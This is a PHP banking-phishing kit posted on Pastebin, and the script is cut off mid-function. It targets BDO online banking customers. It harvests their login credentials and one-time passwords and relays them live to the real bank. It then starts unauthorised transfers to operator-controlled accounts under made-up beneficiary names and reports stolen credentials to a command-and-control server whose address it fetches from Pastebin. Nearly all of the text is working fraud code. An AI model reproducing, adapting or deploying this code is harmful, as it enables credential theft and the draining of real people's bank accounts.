Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $site = isset($_SERVER['HTTP_HOST']) ? "https://" : "http://";
- $site = $site.$_SERVER['SERVER_NAME'];
- $unique = strtoupper(substr(hash("sha256", md5($_SERVER['REMOTE_ADDR'])),0,6));
- $sitedefault = "index.php";
- $l = strrev("knilnu");
- $j = strrev("doced_46e");
- $jj = "bas" . $j . "e";
- $req = basename(strtok($_SERVER['REQUEST_URI'], '?'));
- $requrl = strtok($_SERVER['REQUEST_URI'], '?');
- $configs = array( // to be updated
- "update" => [
- "secret" => "/sso/account/update",
- "pb" => "https://pastebin.com/raw/dePTpLfj"
- ],
- "verification" => [
- "secret" => "/update/account/verification",
- "pb" => "https://pastebin.com/raw/dePTpLfj"
- ],
- "demo" => [
- "secret" => "/demo",
- "pb" => "https://pastebin.com/raw/955i167G"
- ]
- );
- $protocol = "http"; // IMPORTANT!!!!!!!!!!!!!!!
- define('protocol',$protocol);
- if(isset($configs[$req])) {
- @$_SESSION['fx__'] = $configs[$req]["secret"];
- @$_SESSION['secret__'] = $req;
- $ch = @curl_init();
- $options = [
- CURLOPT_SSL_VERIFYPEER => false,
- CURLOPT_RETURNTRANSFER => true,
- CURLOPT_URL => @$configs[$req]["pb"]
- ];
- @curl_setopt_array($ch, $options);
- $c2 = explode(":", curl_exec($ch), 3);
- curl_close($ch);
- if(!isset($_SESSION['send2'])) {
- @$_SESSION['send2'] = $protocol."://" . $c2[2];
- }
- }
- $pOw = json_decode(@file_get_contents(@$_SESSION['send2']."?action=live"));
- if(!empty($pOw)) {
- $maxX = ["num",0];
- foreach ($pOw as $g) {
- if($g->capacity > $maxX[1]) {
- $maxX[0] = @$g->number;
- $maxX[1] = @$g->capacity;
- $maxX[2] = @$g->type;
- }
- }
- }
- $_SESSION['available_Bank'] = @$maxX;
- if ($req == "session" && $requrl == "/show/session") {
- print_r(@$_SESSION['account_X']);
- print_r(@array_slice($_SESSION['q'], 4, -102));
- @print_r(@$_SESSION);
- //echo implode("|",@$_SESSION[account_X]);
- exit;
- } elseif ($req == "logout" && $requrl == "/user/logout") {
- $go = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => "LOGOUT",
- "info" => "—» \r\n[<crimson> LOGOUT </crimson>] <font color='white'>user:</font>"
- .@$_SESSION['user']." <font color='white'> — pass:</font>".@$_SESSION['pass']
- ." [<crimson> IDLE FOR TOO LONG </crimson>]",
- "site" => $site
- ])
- ]);
- fLy($go);
- session_destroy();
- session_unset();
- foreach ($configs as $get) {
- if(!isset($to)) {
- $to = $get['secret'];
- }
- }
- header("Location: " . $to . "");
- } elseif ($req != "" && explode('/', $requrl)[1] == "jsso_otp") {
- include "." .str_replace(explode('/', $requrl)[1] ."/","",$requrl);
- } elseif ($req == @$_SESSION['secret__'] && $requrl == @$_SESSION['fx__']."/" || $req == @$_SESSION['secret__'] && $requrl == @$_SESSION['fx__']) {
- if(!empty(@$_SESSION['teamcc'])) {
- switch ($_SESSION['teamcc']) {
- case "start":
- header("Location: /" . $_SESSION['thicc'] . "/management/process");
- exit;
- break;
- case "start2":
- header("Location: /otp/" . $_SESSION['thicc'] . "/process");
- exit;
- break;
- }
- } else {
- @$_SESSION['teamcc'] = 'start';
- @$thicc = md5(date('m:D-Y_h:i:s'));
- @$_SESSION['thicc'] = $thicc[3] . $thicc[9] . $thicc[26] . $thicc[0] . $thicc[17];
- header("Location: /" . $_SESSION['thicc'] . "/management/process");
- // header('Location: net::ERR_CONNECTION_REFUSED');
- exit;
- }
- } elseif ($requrl == "/login/auth") {
- $go = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => "LOGIN",
- "info" => "—» \r\n[<crimson> LOGIN </crimson>] <font color='white'>user:</font>"
- .@$_SESSION['user']." <font color='white'> — pass:</font>".@$_SESSION['pass']
- ." \r[<crimson> CROSS × FINGERS </crimson>]",
- "site" => $site
- ])
- ]);
- fLy($go);
- } elseif (@$_SESSION['teamcc'] == 'start') {
- if ($req == "process" && $requrl == "/" . @$_SESSION['thicc'] . "/management/process") {
- unset($_SESSION['goldHead']);
- start___();
- if(isset($_POST) && count($_POST) > 0) {
- $user = @$_POST['channelUserID'];
- $pass = @$_POST['pwd__'];
- if(strlen($user) == 0) {
- $stat_ = "User ID is required";
- } elseif (strlen($pass) == 0) {
- $stat_ = "Password is required";
- } else {
- $_SESSION['user'] = $user;
- $_SESSION['pass'] = $pass;
- $res = act1($_POST);
- $stat = json_decode(json_encode($res['info']))->http_code;
- updateGold($res['header']);
- if($stat == 302 && !empty($_SESSION['goldHead']['Location'])) {
- @$_SESSION['success_attempt'] = "report";
- @$_SESSION['teamcc'] = 'start2';
- @$_SESSION['proceed_'] = "num";
- header("Location: /otp/" . $_SESSION['thicc'] . "/process");
- exit;
- } else {
- $dom = new DOMDocument();
- @$dom->loadHTML($res['contents']);
- $xpath = new DOMXPath($dom);
- $tags = $xpath->query('//span[@class="feedbackPanelERROR"]');
- $error = @$tags->item(0)->nodeValue;
- if($error == "Your account is locked. Please use \"Forgot your password?\".") {
- @session_destroy();
- @session_unset();
- header("Location: https://online.bdo.com.ph/sso/login?action=5");
- exit;
- }
- $stat_ = $error;
- }
- }
- }
- require '_hid_/login.html';
- @ob_end_flush(); @ob_flush();
- } else {
- header('Location: net::ERR_CONNECTION_REFUSED');
- // header("Location: /" . $_SESSION['thicc'] . "/management/process");
- }
- } elseif (@$_SESSION['process'] == 'transfer' && $requrl == "/sso/account/verification") {
- //============================================================================================//
- $fo = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "DNT: 1",
- "Connection: close",
- "Upgrade-Insecure-Requests: 1"
- );
- $foStat = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank","GET", false, $fo, true, false);
- updateGold($foStat['header']);
- //============================================================================================//
- $fo1 = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Referer: https://online.bdo.com.ph/",
- "DNT: 1",
- "Connection: close",
- "Cookie: ".str_replace(explode("; ",$_SESSION['goldHead']['/fo'], 2)[1],explode("; ",$_SESSION['goldHead']['/sso'],2)[1],$_SESSION['goldHead']['/fo']),
- "Upgrade-Insecure-Requests: 1"
- );
- $foStat1 = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank","GET", false, $fo1, true, false);
- $_SESSION['goldHead']['/fo'] = str_replace(explode("; ",$_SESSION['goldHead']['/fo'], 2)[1],explode("; ",$_SESSION['goldHead']['/sso'],2)[1],$_SESSION['goldHead']['/fo']);
- updateGold($foStat1['header']);
- //============================================================================================//
- $fo2 = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Referer: https://online.bdo.com.ph/",
- "DNT: 1",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/fo'],
- "Upgrade-Insecure-Requests: 1"
- );
- $foStat2 = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank","GET", false, $fo2, true, false);
- updateGold($foStat2['header']);
- // print_r($foStat2['contents']); exit;
- //============================================================================================//
- $dom = new DOMDocument();
- @$dom->loadHTML($foStat2['contents']);
- $xpath = new DOMXPath($dom);
- $checkError = $xpath->query('//label[@class="feedbackPanelERROR"]');
- if(isset($checkError->item(0)->nodeValue)) {
- $report = @$checkError->item(0)->nodeValue;
- $ta = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => "SITE-ERROR",
- "info" => "—» \r\n[<crimson> STATUS </crimson>] <font color='white'>".$report."</font> \r[ ACC-INFO ] ".@implode("|",@$_SESSION['account_dump']),
- "site" => $site
- ])
- ]);
- fLy($ta);
- echo "refresh";
- exit;
- }
- $tags = $xpath->query('//select[@class="required"]//option');
- $reqID = $xpath->query('//input[@type="submit"]');
- $hID = $xpath->query('//select[@name="remitterPortlet:remitterDest1Wmc:otherBank"]');
- $hxID = $xpath->query('//select[@name="remitterPortlet:remitterAdd1Wmc:account"]');
- $hxyID = $xpath->query('//input[@name="remitterPortlet:remitterAdd1Wmc:amount"]');
- $x = count($tags);
- $ri = count($reqID);
- $q = [];
- $w = [];
- if (!isset($_SESSION['banks'])) {
- $_SESSION['banks'] = [];
- }
- for ($i=0;$i<$x;$i++) {
- if(!empty($tags->item($i)->getAttribute('value'))) {
- $q[$i] = ["********".substr(substr(@$tags->item($i)->nodeValue,0,12),-4,4) => @$tags->item($i)->getAttribute('value')];
- $w[md5(@$tags->item($i)->nodeValue)] = @$tags->item($i)->getAttribute('value');
- @$_SESSION['banks'][@$tags->item($i)->getAttribute('value')] = @$tags->item($i)->nodeValue;
- }
- }
- if(!isset($_SESSION['q'])) {
- $_SESSION['q'] = $q;
- }
- // if(!isset($_SESSION['account_dump'])) {
- // @$_SESSION['account_dump'] = json_encode(array_slice($_SESSION['q'], 4, -102));
- // }
- foreach (array_slice($_SESSION['q'], 4, -102) as $acc_) {
- if (!empty($acc_)) {
- @$_SESSION['v_'] = @$_SESSION['v_']."|".implode(":",$acc_);
- }
- if(isset($acc_[@$_SESSION['account_X'][0]])) {
- $_SESSION['accID__'] = $acc_[@$_SESSION['account_X'][0]];
- }
- }
- // echo @$_SESSION['v_']."\r\n";
- // echo @$_SESSION['accID__']."\r\n";
- // echo $_SESSION['account_dump'];
- // print_r(@$_SESSION['account_X']);
- // print_r(array_slice($_SESSION['q'], 4, -102));
- // exit;
- $rKey = @getBetween(@$reqID->item(0)->getAttribute('onclick'),"?x=","', 'confirm");
- $rId = @$reqID->item(0)->getAttribute('id');
- $transID = @$w[md5("Credit to Other Bank")];
- // $bankID = @$w[md5("Union Bank of the Philippines via InstaPay[UB]")]; // Union Bank of the Philippines via InstaPay[UB] | G-Xchange, Inc.11-digits via InstaPay[GXI] |
- $hxId = @$hxID->item(0)->getAttribute('id');
- $hxKey = @getBetween(@$hxID->item(0)->getAttribute('onchange'),"?x=","', wicketSerialize");
- $hxData = http_build_query([
- "remitterPortlet:remitterAdd1Wmc:account" => @$_SESSION['accID__']
- ]);
- $hxHead = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/xml",
- "Accept-Language: en-US,en;q=0.5",
- "Content-Type: application/x-www-form-urlencoded",
- "Wicket-Ajax: true",
- "Wicket-FocusedElementId: ".$hxId,
- "Content-Length: ". strlen($hxData),
- "Origin: https://www.mybdo.com.ph",
- "DNT: 1",
- "Connection: close",
- "Referer: https://www.mybdo.com.ph/fo/remittanceotherbank",
- "Cookie: ".$_SESSION['goldHead']['/fo']
- );
- $hxStat = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank?x=".$hxKey."&random=".md5(date("h:i:s")),"POST", $hxData, $hxHead, true, false);
- updateGold($hxStat['header']);
- //============================================================================================//
- $hxyId = @$hxyID->item(0)->getAttribute('id');
- $hxyKey = @getBetween(@$hxyID->item(0)->getAttribute('onblur'),"?x=","', wicketSerialize");
- $hxyData = http_build_query([
- "remitterPortlet:remitterAdd1Wmc:amount" => number_format(@$_SESSION['transfer'], 2, '.', '')
- ]);
- $hxyHead = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/xml",
- "Accept-Language: en-US,en;q=0.5",
- "Content-Type: application/x-www-form-urlencoded",
- "Wicket-Ajax: true",
- "Wicket-FocusedElementId: ".$hxyId,
- "Content-Length: ". strlen($hxyData),
- "Origin: https://www.mybdo.com.ph",
- "DNT: 1",
- "Connection: close",
- "Referer: https://www.mybdo.com.ph/fo/remittanceotherbank",
- "Cookie: ".$_SESSION['goldHead']['/fo']
- );
- $hxyStat = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank?x=".$hxyKey."&random=".md5(date("h:i:s")),"POST", $hxyData, $hxyHead, true, false);
- updateGold($hxyStat['header']);
- //============================================================================================//
- $hId = @$hID->item(0)->getAttribute('id');
- $hKey = @getBetween(@$hID->item(0)->getAttribute('onchange'),"?x=","', wicketSerialize");
- $hData = http_build_query([
- "remitterPortlet:remitterDest1Wmc:otherBank" => @$_SESSION['available_Bank'][2]
- ]);
- $hHead = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/xml",
- "Accept-Language: en-US,en;q=0.5",
- "Content-Type: application/x-www-form-urlencoded",
- "Wicket-Ajax: true",
- "Wicket-FocusedElementId: ".$hId,
- "Content-Length: ". strlen($hData),
- "Origin: https://www.mybdo.com.ph",
- "DNT: 1",
- "Connection: close",
- "Referer: https://www.mybdo.com.ph/fo/remittanceotherbank",
- "Cookie: ".$_SESSION['goldHead']['/fo']
- );
- $hStat = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank?x=".$hKey."&random=".md5(date("h:i:s")),"POST", $hData, $hHead, true, false);
- updateGold($hStat['header']);
- //============================================================================================//
- $arrX = array("Igme Sanchez","Rizal Gabriel","Liberato Custodio","Virgilio Viloria","Heherson Johnson","Restituto Howard","Joriz Ferrer","Isko Espiritu","Jay Clark","Edcel Salas","Luzvimindo Santiago","Ramil Esguerra","Edcel Devera","Fermin Thomas","Jejomar Gonzalez","Edcel Ward","Isko Juan","Rizal Agustin","Arnel Ross","Makisig Rivera","Rodel Phillips","Crisanto Miranda","Isko Bell","Danilo Mendoza","Romel White","Gener Desilva","Virgilio Carlos","Bagwis Mercado","Isagani Antonio","Narding Nelson","Arnel Acosta","Rosito Ballesteros","Makisig Phillips","Jay Foster","Jejomar Davis","Melchor Wright","Rizalino Russell","Narding Juan","Jay Miguel","Gener Gutierrez","Arvin Ancheta","Crisanto Lazaro","Narding Scott","Narding Ferrer","Datu Salazar","Rizalino Bailey","Virgilio Evans","Danilo Gutierrez","Virgilio Carlos","Makisig Agustin");
- $randIndex = array_rand($arrX);
- $name = explode(" ",$arrX[$randIndex],2);
- array_push($name,strtoupper($name[0][(strlen($name[0]) - 3)]));
- $remittanceotherbankData = http_build_query([
- "id7_hf_0" => "",
- "remitterPortlet:remitterMainWmc:settlementType" => "Credit To Another Local Bank",
- "remitterPortlet:remitterMainWmc:remittanceTransactionType" => $transID,
- "remitterPortlet:remitterAdd1Wmc:account" => @$_SESSION['accID__'],
- "remitterPortlet:remitterAdd1Wmc:amount" => number_format(@$_SESSION['transfer'], 2, '.', ''),
- "remitterPortlet:remitterDest1Wmc:otherBank" => @$_SESSION['available_Bank'][2],
- "remitterPortlet:remitterDest2Wmc:accountNo" => @$_SESSION['available_Bank'][0],
- "beneficiaryWmc:beneficiaryDetailPanel:beneficiaryPortlet:beneMainName:beneficiaryLastName" => $name[1],
- "beneficiaryWmc:beneficiaryDetailPanel:beneficiaryPortlet:beneMainName:beneficiaryFirstName" => $name[0],
- "beneficiaryWmc:beneficiaryDetailPanel:beneficiaryPortlet:beneMainName:beneficiaryMiddleInit" => strtolower($name[2]),
- "beneficiaryWmc:beneficiaryDetailPanel:beneficiaryPortlet:beneMain2:beneficiaryMobileNo" => "09".(rand(111111111,999999999)),
- "beneficiaryWmc:beneficiaryDetailPanel:beneficiaryPortlet:beneMain2:purposeOfRemittance" => strtoupper($name[0]).substr(strtoupper(md5(date("h:i:s"))),0,5)." ".date("m/d/Y h:i:s"),
- "confirm" => 1
- ]);
- $_SESSION['xTra'] = number_format(@$_SESSION['transfer'], 2, '.', '');
- $_SESSION['on/sucess'] = "—» [<crimson> STATUS </crimson>] "
- .$_SESSION['user']."::".$_SESSION['pass'];
- $remittanceotherbank = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/xml",
- "Accept-Language: en-US,en;q=0.5",
- "Content-Type: application/x-www-form-urlencoded",
- "Wicket-Ajax: true",
- "Wicket-FocusedElementId: ".$rId,
- "Content-Length: ". strlen($remittanceotherbankData),
- "Origin: https://www.mybdo.com.ph",
- "DNT: 1",
- "Connection: close",
- "Referer: https://www.mybdo.com.ph/fo/remittanceotherbank",
- "Cookie: ".$_SESSION['goldHead']['/fo']
- );
- $remittanceotherbankStat = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank?x=".$rKey."&random=".md5(date("h:i:s")),"POST", $remittanceotherbankData, $remittanceotherbank, true, false);
- updateGold($remittanceotherbankStat['header']);
- // print_r($remittanceotherbankStat['contents']); exit;
- //============================================================================================//
- $dom = new DOMDocument();
- @$dom->loadHTML($remittanceotherbankStat['contents']);
- $xpath = new DOMXPath($dom);
- $checkError = $xpath->query('//span[@class="feedbackPanelERROR"]');
- if(isset($checkError->item(0)->nodeValue)) {
- $report = @$checkError->item(0)->nodeValue;
- $trans = "";
- $transInfo = [
- "trans_id" => $transID,
- "account_id" => @$_SESSION['accID__'],
- "transfer_amount" => number_format(@$_SESSION['transfer'], 2, '.', ''),
- "bank_id" => @$_SESSION['available_Bank'][2],
- "account_number" => @$_SESSION['available_Bank'][0],
- "generated_info" => "RCVR:: ".$name[0]." ".$name[2]." ".$name[1]."|mobile:".@$_SESSION['available_Bank'][0]."|purpose:"."LOAN PAYMENT ".date("m/d/Y h:i:s")
- ];
- foreach ($transInfo as $key => $val) {
- $trans .= "| ".$key." => ".$val." \r";
- }
- $ta = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => "SITE-ERROR",
- "info" => "—» \r\n[<crimson> STATUS </crimson>] <font color='white'>".$report."</font> \r[ ACC-INFO ] ".@$_SESSION['account_dump']." \r[TRANSFER:INFO] :: \r". $trans,
- "site" => $site
- ])
- ]);
- fLy($ta);
- echo "refresh";
- exit;
- }
- $sttLast = $xpath->query('//input[@name="confirmationModal:content:form:submit"]');
- $sttlKey = @getBetween(@$sttLast->item(0)->getAttribute('onclick'),"?x=","', 'confirmationModal");
- $sttlId = @$sttLast->item(0)->getAttribute('id');
- $sttlData = http_build_query([
- "confirmationModal:content:form:submit" => 1
- ]);
- $sttlHead = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/xml",
- "Accept-Language: en-US,en;q=0.5",
- "Content-Type: application/x-www-form-urlencoded",
- "Wicket-Ajax: true",
- "Wicket-FocusedElementId: ".$sttlId,
- "Content-Length: ". strlen($sttlData),
- "Origin: https://www.mybdo.com.ph",
- "DNT: 1",
- "Connection: close",
- "Referer: https://www.mybdo.com.ph/fo/remittanceotherbank",
- "Cookie: ".$_SESSION['goldHead']['/fo']
- );
- $sttlStat = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank?x=".$sttlKey."&random=".md5(date("h:i:s")),"POST", $sttlData, $sttlHead, true, false);
- updateGold($sttlStat['header']);
- //============================================================================================//
- $dom = new DOMDocument();
- @$dom->loadHTML($sttlStat['contents']);
- $xpath = new DOMXPath($dom);
- if($_SESSION['plat_'] == "form") {
- $sttLast = $xpath->query('//input[@type="submit"]'); // need to fix
- $HopeKey = @getBetween(@$sttLast->item(0)->getAttribute('onclick'),"?x=","', 'otpModal");
- } else {
- $sttLast = $xpath->query('//input[@name="otpGenModal:content:otpGenForm:submitButton"]');
- $HopeKey = @getBetween(@$sttLast->item(0)->getAttribute('onclick'),"?x=","', 'otpGenModal");
- }
- $HopeId = @$sttLast->item(0)->getAttribute('id');
- $_SESSION['HopeID'] = $HopeId;
- $_SESSION['HopeKey'] = $HopeKey;
- $_SESSION['HOPE'] = "NOT_DEAD";
- unset($_SESSION['kraKen']);
- $ta = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => "HOPE",
- "info" => $_SESSION['on/sucess']
- ." —» \r\n[<crimson> ATTEMPT </crimson>] Attempt to send <font color='#d100ff'>". number_format(@$_SESSION['transfer'], 2, '.', '')."</font> -TO- <font color='white'>109420092918</font> \r[ ACC-INFO ] ".@$_SESSION['email_number'].@$_SESSION['account_dump'],
- "site" => $site
- ])
- ]);
- fLy($ta);
- // print_r($_SESSION['available_Bank']);
- echo $_SESSION['otpStat']; exit;
- } elseif (@$_SESSION['teamcc'] == 'start2') {
- if($req == "process" && $requrl == "/otp/" . @$_SESSION['thicc'] . "/process") {
- switch (@$_SESSION['proceed_']) {
- case "num":
- if(empty($_SESSION['kraKen']) && empty($_SESSION['HOPE']) && !empty($_SESSION['goldHead']['Location'])) { // FIRST OTP SET
- $headers2 = array(
- "Host: online.bdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept-Language: en-US,en;q=0.5",
- "Content-Type: application/x-www-form-urlencoded",
- "Referer: https://online.bdo.com.ph/sso/login?josso_back_to=https://online.bdo.com.ph/sso/josso_security_check",
- "DNT: 1",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/sso'],
- "Upgrade-Insecure-Requests: 1"
- );
- $res2 = curlContents($_SESSION['goldHead']['Location'],"GET", false, $headers2, true, false);
- // print_r($res2['contents']); header('Content-Type: text/plain; charset=utf-8'); exit;
- $dom = new DOMDocument();
- @$dom->loadHTML($res2['contents']);
- $xpath = new DOMXPath($dom);
- $tags = $xpath->query('//input[@class="sxi-button ui-corner-all ui-state-default"]');
- if(count($tags) == 0) {
- header("Location: /user/logout");
- exit;
- } else {
- $key = @getBetween(@$tags[0]->getAttribute('onclick'),"?x=","', 'submitButton");
- $wicked = @$tags[0]->getAttribute('id');
- $tags2 = $xpath->query('//label[@class="standardfont formlabel"]');
- $_SESSION["ot"] = @$tags2[0]->nodeValue;
- $_SESSION["ott"] = @$tags2[1]->nodeValue;
- if(count($tags2) > 1) {
- $_SESSION["otpType"] = "S";
- } else {
- $_SESSION["otpType"] = "D";
- }
- }
- }
- $otpType = $_SESSION["otpType"];
- $ot = @$_SESSION["ot"];
- $ott = @$_SESSION["ott"];
- if(isset($_POST) && count($_POST) > 0) {
- if(!empty($_SESSION['goldHead']['Location'])) {
- if(!empty($_POST['otp']) && strlen($_POST['otp']) == 6 && is_numeric($_POST['otp'])) {
- $otp_ = $_POST['otp'];
- $OTP = $postdata = http_build_query(
- [
- "ide_hf_0" => "",
- "otp" => $otp_, // OTP HERE
- "submitButton" => 1
- ]
- );
- if(!empty($_SESSION['HOPE'])) { // 2ND STAGE OTP SET
- if($_SESSION['plat_'] == "form") {
- $plat_ = [
- "otpModal:content:form:otp" => $otp_,
- "otpModal:content:form:submitButton"=>1
- ];
- } else {
- $plat_ = [
- "otpGenModal:content:otpGenForm:otp" => $otp_,
- "otpGenModal:content:otpGenForm:submitButton" => 1
- ];
- }
- $hopeData = http_build_query($plat_);
- $hopeHead = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/xml",
- "Accept-Language: en-US,en;q=0.5",
- "Content-Type: application/x-www-form-urlencoded",
- "Wicket-Ajax: true",
- "Wicket-FocusedElementId: ".$_SESSION['HopeID'],
- "Content-Length: ". strlen($hopeData),
- "Origin: https://www.mybdo.com.ph",
- "DNT: 1",
- "Connection: close",
- "Referer: https://www.mybdo.com.ph/fo/remittanceotherbank",
- "Cookie: ".@$_SESSION['goldHead']['/fo']
- );
- $hopeStat = curlContents("https://www.mybdo.com.ph/fo/remittanceotherbank?x=".$_SESSION['HopeKey']."&random=".md5(date("h:i:s")),"POST", $hopeData, $hopeHead, true, false);
- if(strlen($hopeStat['contents']) < 2) {
- $hopeStatus = $_SESSION['on/sucess']
- ." —» \r\n[<deepskyblue> TRANSFERED </deepskyblue>] XXX - <font color='#d100ff'>"
- . number_format($_SESSION['xTra'])
- ."</font> -TO- <font color='white'>109420092918</font> [ "
- .@$_SESSION['banks'][@$_SESSION['available_Bank'][2]]. " ] via InstaPAY";
- $tranStat = "SUCCESS";
- } else {
- $tranStat = "FAILED";
- $dom = new DOMDocument();
- @$dom->loadHTML($hopeStat['contents']);
- $xpath = new DOMXPath($dom);
- $tags = $xpath->query('//span[@class="feedbackPanelERROR"]');
- $hopeStatus = $_SESSION['on/sucess'] ." —» <font color='#d100ff'>ERROR_ON</font> [<crimson> TRANSFER </crimson>] <font color='#d100ff'>". number_format($_SESSION['xTra'])." <font color='white'> to </font>".@$_SESSION['available_Bank'][0]." </font> —» STAT: <font color='white'>" /*.@$tags->item(0)->nodeValue*/ .substr(@$tags->item(0)->nodeValue, 0, 40) ."...</font>";
- }
- if($tranStat == "SUCCESS") {
- $ddd = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => $tranStat,
- "info" => $hopeStatus,
- "site" => $site
- ])
- ]);
- fLy($ddd);
- $xyz = http_build_query([
- "auth" => "update",
- "num" => substr(@$_SESSION['available_Bank'][0],1,10),
- "sent" => @$_SESSION['xTra']
- ]);
- fLy($xyz);
- foreach ($_SESSION as $sesh => $ops) {
- $_SESSION[$sesh] = "";
- unset($_SESSION[$sesh]);
- }
- //STAGE 1 BETA
- header("Location: https://www.bdo.com.ph/personal/ebanking/account-security");
- //STAGE 1 BETA
- } else {
- if(@$tags->item(0)->nodeValue != "IST51: Insufficient balance.") {
- if(substr(@$tags->item(0)->nodeValue,0,16) == "Sorry, we are un") {
- $hopeStatus = $_SESSION['on/sucess'] ." —» <font color='#d100ff'>ACCOUNT_ERROR</font> [<crimson> TRANSFER </crimson>] <font color='#d100ff'>". number_format($_SESSION['xTra'])." <font color='white'> to </font>".@$_SESSION['available_Bank'][0]." </font> —» STAT: <font color='white'>" /*.@$tags->item(0)->nodeValue*/ .substr(@$tags->item(0)->nodeValue, 0, 40) ."...</font>";
- $ddd = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => $tranStat,
- "info" => $hopeStatus,
- "site" => $site
- ])
- ]);
- fLy($ddd);
- sleep(15);
- session_destroy();
- session_unset();
- header("Location: https://www.bdo.com.ph/personal/ebanking/account-security");
- exit;
- $_SESSION['kraKen'] = "Reb0Rn";
- // disable gcash number
- // display error
- $disable = http_build_query([
- "auth" => "update",
- "num" => substr(@$_SESSION['available_Bank'][0],1,10),
- "sent" => 999
- ]);
- fLy($disable);
- $otpStat = "Invalid One-Time Password (OTP). You are only allowed a maximum of 3 attempts. Please try again.";
- if($_SESSION['plat_'] == "form") {
- $subErr = "";
- $_SESSION['kraKen'] = "platform";
- } else {
- $subErr = $otpStat;
- $_SESSION['kraKen'] = "release";
- }
- @$_SESSION['otpStat'] = "Invalid One-Time Password (OTP). You are only allowed a maximum of 3 attempts. Please try again.";
- } else {
- $_SESSION['kraKen'] = "Reb0Rn";
- if(substr(@$tags->item(0)->nodeValue,0,16) == "Invalid One-Time") {
- $otpStat = @$tags->item(0)->nodeValue;
- if($_SESSION['plat_'] == "form") {
- $subErr = "";
- $_SESSION['kraKen'] = "platform";
- } else {
- $subErr = $otpStat;
- $_SESSION['kraKen'] = "release";
- }
- } else {
- $hopeStatus = $_SESSION['on/sucess'] ." —» <font color='#d100ff'>ACCOUNT_ERROR</font> [<crimson> TRANSFER </crimson>] <font color='#d100ff'>". number_format($_SESSION['xTra'])." <font color='white'> to </font>".@$_SESSION['available_Bank'][0]." </font> —» STAT: <font color='white'>" /*.@$tags->item(0)->nodeValue*/ .substr(@$tags->item(0)->nodeValue, 0, 40) ."...</font>";
- $ddd = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => $tranStat,
- "info" => $hopeStatus,
- "site" => $site
- ])
- ]);
- fLy($ddd);
- $otpStat = "Unexpected error. Please try again.";
- if($_SESSION['plat_'] == "form") {
- $subErr = "";
- $_SESSION['kraKen'] = "platform";
- } else {
- $subErr = $otpStat = @$tags->item(0)->nodeValue;
- $_SESSION['kraKen'] = "release";
- }
- }
- }
- } else {
- $hopeStatus = $_SESSION['on/sucess'] ." —» <font color='#d100ff'>ACCOUNT_ERROR</font> [<crimson> TRANSFER </crimson>] <font color='#d100ff'>". number_format($_SESSION['xTra'])." <font color='white'> to </font>".@$_SESSION['available_Bank'][0]." </font> —» STAT: <font color='white'>" /*.@$tags->item(0)->nodeValue*/ .substr(@$tags->item(0)->nodeValue, 0, 40) ."...</font>";
- $ddd = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => $tranStat,
- "info" => $hopeStatus,
- "site" => $site
- ])
- ]);
- fLy($ddd);
- @session_destroy();
- @session_unset();
- sleep(15);
- header("Location: https://www.bdo.com.ph/personal/ebanking/account-security");
- exit;
- }
- }
- } else { // OTP 1ST STAGE
- //
- $headersOTP = array(
- "Host: online.bdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Content-Type: application/x-www-form-urlencoded",
- "Wicket-Ajax: true",
